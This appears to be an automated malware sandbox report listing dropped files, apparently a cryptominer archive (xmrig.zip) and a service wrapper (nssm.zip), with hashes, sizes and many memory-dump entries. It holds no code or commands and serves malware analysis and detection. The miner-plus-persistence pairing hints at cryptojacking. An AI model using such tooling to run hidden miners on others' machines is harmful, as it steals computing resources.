C:\Users\Admin\nssm.zip
Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip
Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/3912-420-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-418-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-424-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-413-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-422-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-421-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-419-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-417-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-414-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-415-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-423-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3912-416-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4516-5-0x000001D9D0A80000-0x000001D9D0AA2000-memory.dmp

Filesize
136KB

Download
memory/4516-9-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

Filesize
9.9MB

Download
memory/4516-8-0x000001D9D0C50000-0x000001D9D0CC6000-memory.dmp

Filesize
472KB

Download
memory/4516-18-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

Filesize
9.9MB

Download
memory/4516-25-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

Filesize
9.9MB

Download
memory/4516-3-0x00007FFA9F7A3000-0x00007FFA9F7A4000-memory.dmp

Filesize
4KB

Download
memory/4516-412-0x00007FFA9F7A0000-0x00007FFAA018C000-memory.dmp

Filesize
9.9MB

Download
memory/4644-87-0x0000013372E50000-0x0000013372E5A000-memory.dmp

Filesize
40KB

Download
memory/4644-88-0x0000013372E80000-0x0000013372E92000-memory.dmp

Filesize
72KB

Download
memory/4732-130-0x0000000001700000-0x0000000001720000-memory.dmp

Filesize
128KB

Download
memory/4732-131-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download